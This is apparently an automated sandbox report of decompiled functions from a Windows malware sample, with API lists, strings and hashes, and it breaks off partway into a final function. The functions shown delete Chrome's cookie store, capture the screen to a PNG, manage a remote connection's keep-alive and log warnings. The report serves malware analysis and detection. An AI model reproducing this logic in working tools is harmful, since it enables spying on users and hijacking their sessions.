                              Function 0040A320, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 75%
                              			E0040A320(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t31;
				void* _t32;

				_t35 = __eflags;
				_t31 = __edi;
				_t30 = E00402064(_t20,  &_v52, E0043919A(_t20, __eflags, "UserProfile"));
				E0040530D(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
				L00401FA7();
				if(DeleteFileA(L00401F75( &_v28)) != 0) {
					_t28 = _t32 - 0x18;
					_push("\n[Chrome Cookies found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t32 - 0x18;
						_push("\n[Chrome Cookies not found]");
						L6:
						E00402064(_t20, _t28);
						L0040AA8C(_t20, _t30, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				L00401FA7();
				return _t21;
			}













                              0x0040a320
                              0x0040a320
                              0x0040a340
                              0x0040a345
                              0x0040a34e
                              0x0040a364
                              0x0040a38a
                              0x0040a38c
                              0x00000000
                              0x0040a366
                              0x0040a36d
                              0x0040a370
                              0x0040a37e
                              0x0040a380
                              0x0040a391
                              0x0040a391
                              0x0040a396
                              0x0040a39b
                              0x0040a377
                              0x0040a377
                              0x0040a377
                              0x0040a370
                              0x0040a3a3
                              0x0040a3ae

                              APIs
                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040A35C
                              • GetLastError.KERNEL32 ref: 0040A366
                              Strings
                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A327
                              • UserProfile, xrefs: 0040A32C
                              • [Chrome Cookies not found], xrefs: 0040A380
                              • [Chrome Cookies found, cleared!], xrefs: 0040A38C
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: DeleteErrorFileLast
                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                              • API String ID: 2018770650-304995407
                              • Opcode ID: 70a1b1cb6d7a7f33da873a93c86b3163fccb599da4993ef9213784b14d4c6033
                              • Instruction ID: 71bab83c232eb3aa80a51950a53fe90676adfd60c2a68e252f2a60659ee967f7
                              • Opcode Fuzzy Hash: 70a1b1cb6d7a7f33da873a93c86b3163fccb599da4993ef9213784b14d4c6033
                              • Instruction Fuzzy Hash: 38016761A4030556CB09BAB5DD1BCAE7724A912705B50017FFC02731D2FD7D591D85DF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004050E5, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38synchronizationCOMMON
                              Download Yara Rule
                              C-Code - Quality: 86%
                              			E004050E5(void* __ecx, void* __edi, char _a4) {
				void* _t17;
				void* _t22;
				void* _t23;

				_t22 = __ecx;
				if( *((char*)(__ecx + 0x50)) == 0) {
					return 0;
				}
				if(_a4 == 0) {
					_t24 = _t23 - 0x18;
					E00402064(_t17, _t23 - 0x18, "Connection KeepAlive disabled");
					E00402064(_t17, _t24 - 0x18, "[WARNING]");
					L004165D8(_t17, __edi);
				}
				 *(_t22 + 0x58) = CreateEventA(0, 0, 0, 0);
				SetEvent( *(_t22 + 0x54));
				WaitForSingleObject( *(_t22 + 0x58), 0xffffffff);
				CloseHandle( *(_t22 + 0x58));
				return 1;
			}






                              0x004050e9
                              0x004050ef
                              0x00000000
                              0x0040514d
                              0x004050f5
                              0x004050f7
                              0x00405101
                              0x00405110
                              0x00405115
                              0x0040511a
                              0x0040512c
                              0x0040512f
                              0x0040513a
                              0x00405143
                              0x00000000

                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C138,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 00405123
                              • SetEvent.KERNEL32(?,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 0040512F
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 0040513A
                              • CloseHandle.KERNEL32(?,?,00404C73,00000001,0046C138,00404C20,00000000,00000000,00000000), ref: 00405143
                                • Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                              • String ID: Connection KeepAlive disabled$[WARNING]
                              • API String ID: 2993684571-804309475
                              • Opcode ID: 4142714a34967f6aba7196dcd1083ca1275fa1a77276a330c2e12a530647b9a0
                              • Instruction ID: 4a3f3a8db73678ad982533098c460406716fc9acf26f117caeb6870947dcbcc6
                              • Opcode Fuzzy Hash: 4142714a34967f6aba7196dcd1083ca1275fa1a77276a330c2e12a530647b9a0
                              • Instruction Fuzzy Hash: 4CF0C8718007507BDB113F759D0EA677F98DB01356F00057AF901926F2D9B585548B5A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004160D6, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                              Download Yara Rule
                              C-Code - Quality: 86%
                              			E004160D6(WCHAR* __ecx) {
				void* __edi;
				void* _t7;
				void* _t11;
				WCHAR* _t13;
				void* _t15;

				_t16 = _t15 - 0x18;
				_t13 = __ecx;
				E00402064(_t7, _t15 - 0x18, "Alarm has been triggered!");
				E00402064(_t7, _t16 - 0x18, "[ALARM]");
				L004165D8(_t7, _t11);
				PlaySoundW(_t13, GetModuleHandleA(0), 0x20009);
				Sleep(0x2710);
				return PlaySoundW(0, 0, 0);
			}








                              0x004160d8
                              0x004160db
                              0x004160e4
                              0x004160f3
                              0x004160f8
                              0x00416116
                              0x0041611d
                              0x0041612a

                              APIs
                                • Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2
                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00416108
                              • PlaySoundW.WINMM(00000000,00000000), ref: 00416116
                              • Sleep.KERNEL32(00002710), ref: 0041611D
                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00416126
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: PlaySound$HandleLocalModuleSleepTime
                              • String ID: Alarm has been triggered!$[ALARM]
                              • API String ID: 614609389-1190268461
                              • Opcode ID: 5adc81e4b1297545738adb94dadc43828fb03c5888ff549bd28b3a8ffb28104c
                              • Instruction ID: 2d10eecb587f4eb50cd82e886fdd1c0de5a54b8a21b058e5acdb0cdc04fd1f38
                              • Opcode Fuzzy Hash: 5adc81e4b1297545738adb94dadc43828fb03c5888ff549bd28b3a8ffb28104c
                              • Instruction Fuzzy Hash: FFE09262A00320379524377B7D0FD2F2D28CAC2BA2B01006FFA08661D29D944900C6FB
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004350A9, Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                              Download Yara Rule
                              C-Code - Quality: 69%
                              			E004350A9(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
				intOrPtr _v0;
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __esi;
				void* __ebp;
				signed int _t61;
				void* _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t73;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t81;
				void* _t82;
				signed int _t84;
				void* _t85;
				signed int _t87;
				signed int _t93;
				signed int _t102;
				void* _t104;
				signed int _t107;
				signed int* _t110;
				signed int* _t111;
				intOrPtr* _t113;
				signed int _t118;
				signed int _t120;
				signed int _t123;
				void* _t125;
				signed int _t128;
				signed int _t131;
				signed int _t139;
				signed int _t145;
				void _t147;
				void* _t148;
				void* _t150;
				void* _t152;
				signed int _t153;
				signed int _t154;
				void* _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;

				_t139 = __edx;
				_t155 = _a4;
				if(_t155 == 0) {
					_t113 = L00439E14();
					_t159 = 0x16;
					 *_t113 = _t159;
					E0043626D();
					return _t159;
				}
				_push(__edi);
				_t123 = 9;
				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
				_t145 = _a8;
				__eflags = _t145;
				if(_t145 == 0) {
					_t111 = L00439E14();
					_t158 = 0x16;
					 *_t111 = _t158;
					E0043626D();
					_t78 = _t158;
					L12:
					return _t78;
				}
				_push(__ebx);
				__eflags =  *(_t145 + 4);
				if(__eflags <= 0) {
					if(__eflags < 0) {
						L10:
						_t110 = L00439E14();
						_t157 = 0x16;
						 *_t110 = _t157;
						_t78 = _t157;
						L11:
						goto L12;
					}
					__eflags =  *_t145;
					if( *_t145 < 0) {
						goto L10;
					}
				}
				_t64 = 7;
				__eflags =  *(_t145 + 4) - _t64;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						goto L10;
					}
					__eflags =  *_t145 - 0x93406fff;
					if(__eflags > 0) {
						goto L10;
					}
				}
				L00441D1C(0, _t145, _t155, __eflags);
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t67 = L00441551( &_v12);
				_pop(_t125);
				__eflags = _t67;
				if(_t67 == 0) {
					_t75 = L0044157D( &_v16);
					_pop(_t125);
					__eflags = _t75;
					if(_t75 == 0) {
						_t77 = L004415A9( &_v8);
						_pop(_t125);
						__eflags = _t77;
						if(_t77 == 0) {
							_t118 =  *(_t145 + 4);
							_t128 =  *_t145;
							__eflags = _t118;
							if(__eflags < 0) {
								L28:
								_push(_t145);
								_push(_t155);
								_t78 = E0043B307();
								__eflags = _t78;
								if(_t78 != 0) {
									goto L11;
								}
								__eflags = _v12;
								asm("cdq");
								_t147 =  *_t155;
								_t120 = _t139;
								if(__eflags == 0) {
									L32:
									_t80 = _v8;
									L33:
									asm("cdq");
									_t148 = _t147 - _t80;
									asm("sbb ebx, edx");
									_t81 = L004504E0(_t148, _t120, 0x3c, 0);
									 *_t155 = _t81;
									__eflags = _t81;
									if(_t81 < 0) {
										_t148 = _t148 + 0xffffffc4;
										 *_t155 = _t81 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t82 = L00450430(_t148, _t120, 0x3c, 0);
									_t121 = _t139;
									_t28 = _t155 + 4; // 0x848d0045
									asm("cdq");
									_t150 = _t82 +  *_t28;
									asm("adc ebx, edx");
									_t84 = L004504E0(_t150, _t139, 0x3c, 0);
									 *(_t155 + 4) = _t84;
									__eflags = _t84;
									if(_t84 < 0) {
										_t150 = _t150 + 0xffffffc4;
										 *(_t155 + 4) = _t84 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t85 = L00450430(_t150, _t121, 0x3c, 0);
									_t122 = _t139;
									_t31 = _t155 + 8; // 0xa824
									asm("cdq");
									_t152 = _t85 +  *_t31;
									asm("adc ebx, edx");
									_t87 = L004504E0(_t152, _t139, 0x18, 0);
									 *(_t155 + 8) = _t87;
									__eflags = _t87;
									if(_t87 < 0) {
										_t152 = _t152 + 0xffffffe8;
										 *(_t155 + 8) = _t87 + 0x18;
										asm("adc ebx, 0xffffffff");
									}
									_t131 = L00450430(_t152, _t122, 0x18, 0);
									__eflags = _t139;
									if(__eflags < 0) {
										L48:
										_t44 = _t155 + 0x18; // 0xa024848d
										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
										asm("cdq");
										_t153 = 7;
										_t51 = _t155 + 0xc; // 0x50506a00
										_t93 =  *_t51;
										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
										__eflags = _t93;
										if(_t93 > 0) {
											goto L43;
										}
										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
										 *(_t155 + 0xc) = _t93 + 0x1f;
										_t55 = _t131 + 0x16d; // 0x16d
										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
										goto L44;
									} else {
										if(__eflags > 0) {
											L42:
											_t34 = _t155 + 0x18; // 0xa024848d
											asm("cdq");
											_t154 = 7;
											_t39 = _t155 + 0xc;
											 *_t39 =  *(_t155 + 0xc) + _t131;
											__eflags =  *_t39;
											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
											L43:
											_t42 = _t155 + 0x1c;
											 *_t42 =  *(_t155 + 0x1c) + _t131;
											__eflags =  *_t42;
											L44:
											_t78 = 0;
											goto L11;
										}
										__eflags = _t131;
										if(_t131 == 0) {
											__eflags = _t139;
											if(__eflags > 0) {
												goto L44;
											}
											if(__eflags < 0) {
												goto L48;
											}
											__eflags = _t131;
											if(_t131 >= 0) {
												goto L44;
											}
											goto L48;
										}
										goto L42;
									}
								}
								_push(_t155);
								_t102 = L00441D6D(_t120, _t147, _t155, __eflags);
								__eflags = _t102;
								if(_t102 == 0) {
									goto L32;
								}
								_t80 = _v8 + _v16;
								 *((intOrPtr*)(_t155 + 0x20)) = 1;
								goto L33;
							}
							if(__eflags > 0) {
								L20:
								_t104 = 7;
								__eflags = _t118 - _t104;
								if(__eflags > 0) {
									goto L28;
								}
								if(__eflags < 0) {
									L23:
									asm("cdq");
									_push( &_v24);
									asm("sbb ebx, edx");
									_v24 = _t128 - _v8;
									_push(_t155);
									_v20 = _t118;
									_t78 = E0043B307();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									__eflags = _v12 - _t78;
									if(__eflags == 0) {
										goto L44;
									}
									_push(_t155);
									_t107 = L00441D6D(_t118, _t145, _t155, __eflags);
									__eflags = _t107;
									if(_t107 == 0) {
										goto L44;
									}
									asm("cdq");
									_v24 = _v24 - _v16;
									_push( &_v24);
									asm("sbb [ebp-0x10], edx");
									_push(_t155);
									_t78 = E0043B307();
									__eflags = _t78;
									if(_t78 != 0) {
										goto L11;
									}
									 *((intOrPtr*)(_t155 + 0x20)) = 1;
									goto L44;
								}
								__eflags = _t128 - 0x933c7b7f;
								if(_t128 >= 0x933c7b7f) {
									goto L28;
								}
								goto L23;
							}
							__eflags = _t128 - 0x3f480;
							if(_t128 <= 0x3f480) {
								goto L28;
							}
							goto L20;
						}
					}
				}
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E0043629A();
				asm("int3");
				_push(_t155);
				_t69 = E0043B2A2(_t125);
				_t156 = _t69;
				__eflags = _t156;
				if(_t156 != 0) {
					_push(_v0);
					_t70 = E004350A9(0, _t139, _t145, _t156);
					asm("sbb eax, eax");
					_t73 =  !( ~_t70) & _t156;
					__eflags = _t73;
					return _t73;
				}
				return _t69;
			}




















































                              0x004350a9
                              0x004350b2
                              0x004350b7
                              0x004350b9
                              0x004350c0
                              0x004350c1
                              0x004350c3
                              0x00000000
                              0x004350c8
                              0x004350cc
                              0x004350d4
                              0x004350d5
                              0x004350d7
                              0x004350da
                              0x004350dc
                              0x004350de
                              0x004350e5
                              0x004350e6
                              0x004350e8
                              0x004350ed
                              0x0043511e
                              0x00000000
                              0x0043511e
                              0x004350f1
                              0x004350f4
                              0x004350f7
                              0x004350f9
                              0x00435111
                              0x00435111
                              0x00435118
                              0x00435119
                              0x0043511b
                              0x0043511d
                              0x00000000
                              0x0043511d
                              0x004350fb
                              0x004350fd
                              0x00000000
                              0x00000000
                              0x004350fd
                              0x00435101
                              0x00435102
                              0x00435105
                              0x00435107
                              0x00000000
                              0x00000000
                              0x00435109
                              0x0043510f
                              0x00000000
                              0x00000000
                              0x0043510f
                              0x00435124
                              0x0043512c
                              0x00435130
                              0x00435133
                              0x00435136
                              0x0043513b
                              0x0043513c
                              0x0043513e
                              0x00435148
                              0x0043514d
                              0x0043514e
                              0x00435150
                              0x0043515a
                              0x0043515f
                              0x00435160
                              0x00435162
                              0x00435168
                              0x0043516b
                              0x0043516d
                              0x0043516f
                              0x004351f0
                              0x004351f0
                              0x004351f1
                              0x004351f2
                              0x004351f9
                              0x004351fb
                              0x00000000
                              0x00000000
                              0x00435201
                              0x00435207
                              0x00435208
                              0x0043520a
                              0x0043520c
                              0x00435228
                              0x00435228
                              0x0043522b
                              0x0043522b
                              0x0043522c
                              0x00435232
                              0x00435236
                              0x0043523b
                              0x0043523d
                              0x0043523f
                              0x00435244
                              0x00435247
                              0x00435249
                              0x00435249
                              0x00435252
                              0x00435259
                              0x0043525b
                              0x0043525e
                              0x0043525f
                              0x00435265
                              0x00435269
                              0x0043526e
                              0x00435271
                              0x00435273
                              0x00435278
                              0x0043527b
                              0x0043527e
                              0x0043527e
                              0x00435287
                              0x0043528e
                              0x00435290
                              0x00435293
                              0x00435294
                              0x0043529a
                              0x0043529e
                              0x004352a3
                              0x004352a6
                              0x004352a8
                              0x004352ad
                              0x004352b0
                              0x004352b3
                              0x004352b3
                              0x004352c1
                              0x004352c3
                              0x004352c5
                              0x004352f2
                              0x004352f2
                              0x004352f8
                              0x004352ff
                              0x00435300
                              0x00435303
                              0x00435303
                              0x00435306
                              0x00435309
                              0x0043530b
                              0x00000000
                              0x00000000
                              0x00435310
                              0x00435317
                              0x0043531a
                              0x00435320
                              0x00435323
                              0x00000000
                              0x004352c7
                              0x004352c7
                              0x004352cd
                              0x004352cd
                              0x004352d4
                              0x004352d5
                              0x004352d8
                              0x004352d8
                              0x004352d8
                              0x004352db
                              0x004352de
                              0x004352de
                              0x004352de
                              0x004352de
                              0x004352e1
                              0x004352e1
                              0x00000000
                              0x004352e1
                              0x004352c9
                              0x004352cb
                              0x004352e8
                              0x004352ea
                              0x00000000
                              0x00000000
                              0x004352ec
                              0x00000000
                              0x00000000
                              0x004352ee
                              0x004352f0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004352f0
                              0x00000000
                              0x004352cb
                              0x004352c5
                              0x0043520e
                              0x0043520f
                              0x00435215
                              0x00435217
                              0x00000000
                              0x00000000
                              0x0043521c
                              0x0043521f
                              0x00000000
                              0x0043521f
                              0x00435171
                              0x0043517b
                              0x0043517d
                              0x0043517e
                              0x00435180
                              0x00000000
                              0x00000000
                              0x00435182
                              0x0043518c
                              0x0043518f
                              0x00435195
                              0x00435196
                              0x00435198
                              0x0043519b
                              0x0043519c
                              0x0043519f
                              0x004351a6
                              0x004351a8
                              0x00000000
                              0x00000000
                              0x004351ae
                              0x004351b1
                              0x00000000
                              0x00000000
                              0x004351b7
                              0x004351b8
                              0x004351be
                              0x004351c0
                              0x00000000
                              0x00000000
                              0x004351c9
                              0x004351ca
                              0x004351d0
                              0x004351d1
                              0x004351d4
                              0x004351d5
                              0x004351dc
                              0x004351de
                              0x00000000
                              0x00000000
                              0x004351e4
                              0x00000000
                              0x004351e4
                              0x00435184
                              0x0043518a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043518a
                              0x00435173
                              0x00435179
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00435179
                              0x00435162
                              0x00435150
                              0x00435328
                              0x00435329
                              0x0043532a
                              0x0043532b
                              0x0043532c
                              0x0043532d
                              0x00435332
                              0x00435338
                              0x00435339
                              0x0043533e
                              0x00435340
                              0x00435342
                              0x00435344
                              0x00435348
                              0x00435350
                              0x00435355
                              0x00435355
                              0x00000000
                              0x00435355
                              0x00435359

                              APIs
                              • __allrem.LIBCMT ref: 00435236
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435252
                              • __allrem.LIBCMT ref: 00435269
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00435287
                              • __allrem.LIBCMT ref: 0043529E
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004352BC
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                              • String ID:
                              • API String ID: 1992179935-0
                              • Opcode ID: ddd8ce45931a40e5443d8a9b3d2240e4d1af6a873fc9811b2285e9f9c346daaf
                              • Instruction ID: 0f9574e79e851dcb61412f9348aa4e336ac1525895054df9afc56f3bdc95fefa
                              • Opcode Fuzzy Hash: ddd8ce45931a40e5443d8a9b3d2240e4d1af6a873fc9811b2285e9f9c346daaf
                              • Instruction Fuzzy Hash: B6813E72A00F059BEB20AE69CC42B6B73E8DF49768F14552FF511D7382E778D9408B98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041510D, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 94%
                              			E0041510D(void* __ecx, void* __edx, void* __eflags) {
				char _v1048;
				char _v1056;
				char _v1092;
				void* _v1096;
				char _v1112;
				char _v1120;
				void* _v1124;
				void* _v1136;
				char _v1144;
				char _v1152;
				char _v1156;
				void* _v1160;
				char _v1184;
				char _v1200;
				void* _v1204;
				char _v1224;
				char _v1232;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t39;
				void* _t54;
				void* _t57;
				void* _t60;
				void* _t67;
				void* _t73;
				char* _t84;
				char* _t86;
				void* _t120;
				void* _t121;
				void* _t123;
				intOrPtr* _t124;
				signed int _t128;
				void* _t130;

				_t133 = __eflags;
				_t130 = (_t128 & 0xfffffff8) - 0x4b4;
				_t121 = __ecx;
				_t74 = __edx;
				E00403086(__edx,  &_v1184, E0040425F(__edx,  &_v1156, __ecx), _t121, __eflags, L"png");
				L00401ED0();
				E004142A5( &_v1120, __edx, __eflags, 0);
				_t84 =  &_v1120;
				_t39 =  *0x46bd10(L00401F75(_t84), L00402469(), _t120, _t123, _t73);
				_t124 = _t39;
				L00413DBA( &_v1144, _t124);
				_t86 = L"image/png";
				L00414611(_t86,  &_v1112);
				L00413E32(L00401ECB( &_v1200),  &_v1152, _t43,  &_v1112);
				 *((intOrPtr*)( *_t124 + 8))(_t124, _t86, _t84);
				if( *((char*)(L00401F75(L00401E29(0x46c578,  &_v1112, _t133, 0x1b)))) == 1) {
					E004020B5(__edx,  &_v1224);
					_t54 = E00417334(L00401ECB( &_v1200),  &_v1224);
					_t135 = _t54;
					if(_t54 != 0) {
						DeleteFileW(L00401ECB( &_v1200));
						_t57 = L00402469();
						L00405A2F( &_v1048, L00401F75(0x46c560), _t57);
						_t60 = L00402469();
						L00405B57(_t74,  &_v1056,  &_v1224,  &_v1184, L00401F75( &_v1232), _t60);
						E00403086(_t74,  &_v1120, E0040425F(_t74,  &_v1092, _t121), _t121, _t135, L"dat");
						L00401ED0();
						_t67 = L00401ECB( &_v1120);
						E004020CC(_t74, _t130 - 0x18, _t64, _t135,  &_v1200);
						L004173A6(_t67);
						L00401ED0();
						L00401FA7();
					}
					_t48 = L00401FA7();
				}
				L00413DE0(_t48,  &_v1152);
				L00401FA7();
				return L00401ED0();
			}





































                              0x0041510d
                              0x00415113
                              0x0041511c
                              0x0041511e
                              0x00415135
                              0x0041513f
                              0x0041514c
                              0x0041515c
                              0x00415166
                              0x0041516d
                              0x00415174
                              0x00415180
                              0x00415185
                              0x004151a1
                              0x004151a9
                              0x004151c2
                              0x004151cc
                              0x004151e0
                              0x004151e5
                              0x004151e7
                              0x004151f7
                              0x00415204
                              0x00415219
                              0x00415222
                              0x0041523e
                              0x0041525e
                              0x0041526b
                              0x00415277
                              0x00415288
                              0x0041528f
                              0x0041529e
                              0x004152a7
                              0x004152a7
                              0x004152b0
                              0x004152b0
                              0x004152b9
                              0x004152c2
                              0x004152d6

                              APIs
                                • Part of subcall function 004142A5: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004142C0
                                • Part of subcall function 004142A5: CreateCompatibleDC.GDI32(00000000), ref: 004142CC
                              • SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 00415166
                                • Part of subcall function 00413DBA: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 00413DD0
                                • Part of subcall function 00413E32: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 00413E43
                                • Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D90), ref: 00417351
                              • DeleteFileW.KERNEL32(00000000,0000001B), ref: 004151F7
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Create$File$GdipImageStream$CompatibleDeleteFromLoadSave
                              • String ID: dat$image/png$png
                              • API String ID: 1095564277-186023265
                              • Opcode ID: 324acede04209f88abe064a2bb7982f93cd85cd0cfaadc48bf52832e5e4252ee
                              • Instruction ID: ec78f574bbb469ede11c5765e841e4de501cabfd3cecff2c18e23e093a1ab6d9
                              • Opcode Fuzzy Hash: 324acede04209f88abe064a2bb7982f93cd85cd0cfaadc48bf52832e5e4252ee
                              • Instruction Fuzzy Hash: 9B4164721043405AC314FB62DC56DEFB7A9AF91348F40093FF586671E2EF385A49CA9A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405165, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44synchronizationCOMMON
                              Download Yara Rule
                              C-Code - Quality: 83%
                              			E00405165(void* __ecx, void* __edi) {
				void* __ebx;
				long _t19;
				intOrPtr _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				intOrPtr _t38;

				_t29 = __edi;
				_t30 = __ecx;
				 *((intOrPtr*)(__ecx + 0x60)) = 0;
				if( *((intOrPtr*)(__ecx + 0x5c)) <= 0) {
					L3:
					 *((char*)(_t30 + 0x50)) = 0;
					_t38 =  *0x46bb07; // 0x0
					if(_t38 != 0) {
						_t32 = _t31 - 0x18;
						E00402064(0, _t31 - 0x18, "Connection timeout");
						E00402064(0, _t32 - 0x18, "[WARNING]");
						L004165D8(0, _t29);
					}
					L00404DD5(_t30);
					return 1;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t19 = WaitForSingleObject( *(_t30 + 0x54), 0x3e8);
					 *((intOrPtr*)(_t30 + 0x60)) =  *((intOrPtr*)(_t30 + 0x60)) + 1;
					_t28 =  *((intOrPtr*)(_t30 + 0x60));
					if(_t19 == 0) {
						break;
					}
					if(_t28 <  *((intOrPtr*)(_t30 + 0x5c))) {
						continue;
					}
					goto L3;
				}
				CloseHandle( *(_t30 + 0x54));
				 *(_t30 + 0x54) = 0;
				 *((char*)(_t30 + 0x50)) = 0;
				SetEvent( *(_t30 + 0x58));
				return 0;
			}










                              0x00405165
                              0x00405167
                              0x0040516b
                              0x00405171
                              0x00405190
                              0x00405190
                              0x00405193
                              0x00405199
                              0x0040519b
                              0x004051a5
                              0x004051b4
                              0x004051b9
                              0x004051be
                              0x004051c3
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00405173
                              0x00405173
                              0x0040517b
                              0x00405181
                              0x00405184
                              0x00405189
                              0x00000000
                              0x00000000
                              0x0040518e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040518e
                              0x004051d1
                              0x004051da
                              0x004051dd
                              0x004051e0
                              0x00000000

                              APIs
                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00405160), ref: 0040517B
                              • CloseHandle.KERNEL32(?), ref: 004051D1
                              • SetEvent.KERNEL32(?), ref: 004051E0
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandleObjectSingleWait
                              • String ID: Connection timeout$[WARNING]
                              • API String ID: 2055531096-1470507543
                              • Opcode ID: 5c9440fae83593d4e53e6a5a4215dc2b96a8acf04a93199ab539a1b889046901
                              • Instruction ID: ae60f77654cc690ea069452027dfbba6838492d045179776455cce24e18ac643
                              • Opcode Fuzzy Hash: 5c9440fae83593d4e53e6a5a4215dc2b96a8acf04a93199ab539a1b889046901
                              • Instruction Fuzzy Hash: C301D431A04F40AFC725BF35895651BBFA1EF0134A740083EE48396AA2CBB99408CB4A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0043C2CD, Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                              Download Yara Rule
                              C-Code - Quality: 83%
                              			E0043C2CD(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
